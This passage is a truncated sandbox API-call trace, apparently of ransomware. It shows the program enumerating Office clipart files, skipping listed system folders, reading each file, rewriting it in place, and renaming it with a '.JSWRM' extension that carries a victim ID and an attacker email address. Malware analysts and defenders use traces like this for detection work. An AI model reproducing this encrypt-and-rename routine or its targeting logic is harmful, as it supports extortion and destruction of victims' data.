lpUsedDefaultChar=0x0) returned 12 [0091.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.170] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=105053) returned 1 [0091.171] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19a50) returned 0x24d210 [0091.171] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x19a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x19a50, lpOverlapped=0x0) returned 1 [0091.180] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.180] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x19a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x19a50, lpOverlapped=0x0) returned 1 [0091.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.181] CloseHandle (hObject=0x314) returned 1 [0091.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0091.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0091.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0091.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0091.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0091.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0091.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.182] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17742, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0400005.PNG", cAlternateFileName="")) returned 1 [0091.182] lstrcmpiW (lpString1="J0400005.PNG", lpString2=".") returned 1 [0091.182] lstrcmpiW (lpString1="J0400005.PNG", lpString2="..") returned 1 [0091.182] lstrcmpiW (lpString1="J0400005.PNG", lpString2="...") returned 1 [0091.182] lstrcmpiW (lpString1="J0400005.PNG", lpString2="windows") returned -1 [0091.182] lstrcmpiW (lpString1="J0400005.PNG", lpString2="recovery") returned -1 [0091.183] lstrcmpiW (lpString1="J0400005.PNG", lpString2="perflogs") returned -1 [0091.183] lstrcmpiW (lpString1="J0400005.PNG", lpString2="documents and settings") returned 1 [0091.183] lstrcmpiW (lpString1="J0400005.PNG", lpString2="$RECYCLE.BIN") returned 1 [0091.183] lstrcmpiW (lpString1="J0400005.PNG", lpString2="system volume information") returned -1 [0091.183] lstrcmpiW (lpString1="J0400005.PNG", lpString2="msocache") returned -1 [0091.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400005.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400005.PNG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400005.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400005.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400005.PNG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400005.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0091.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.183] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=96066) returned 1 [0091.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17740) returned 0x24d210 [0091.184] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17740, lpOverlapped=0x0) returned 1 [0091.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.193] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17740, lpOverlapped=0x0) returned 1 [0091.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.194] CloseHandle (hObject=0x314) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0091.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0091.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0091.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2645, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="JAVA_01.MID", cAlternateFileName="")) returned 1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2=".") returned 1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="..") returned 1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="...") returned 1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="windows") returned -1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="recovery") returned -1 [0091.195] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="perflogs") returned -1 [0091.196] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="documents and settings") returned 1 [0091.196] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0091.196] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="system volume information") returned -1 [0091.196] lstrcmpiW (lpString1="JAVA_01.MID", lpString2="msocache") returned -1 [0091.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAVA_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAVA_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JAVA_01.MID", lpUsedDefaultChar=0x0) returned 11 [0091.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0091.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAVA_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAVA_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JAVA_01.MID", lpUsedDefaultChar=0x0) returned 11 [0091.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.204] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9797) returned 1 [0091.204] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2640) returned 0x24d210 [0091.205] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2640, lpOverlapped=0x0) returned 1 [0091.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.207] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2640, lpOverlapped=0x0) returned 1 [0091.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.208] CloseHandle (hObject=0x314) returned 1 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0091.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0091.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0091.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.209] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16d3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="JNGLE_01.MID", cAlternateFileName="")) returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2=".") returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="..") returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="...") returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="windows") returned -1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="recovery") returned -1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="perflogs") returned -1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="documents and settings") returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="system volume information") returned -1 [0091.209] lstrcmpiW (lpString1="JNGLE_01.MID", lpString2="msocache") returned -1 [0091.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0091.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JNGLE_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JNGLE_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JNGLE_01.MID", lpUsedDefaultChar=0x0) returned 12 [0091.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0091.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JNGLE_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JNGLE_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JNGLE_01.MID", lpUsedDefaultChar=0x0) returned 12 [0091.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.210] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5843) returned 1 [0091.210] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16d0) returned 0x205850 [0091.210] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16d0, lpOverlapped=0x0) returned 1 [0091.212] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.212] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, 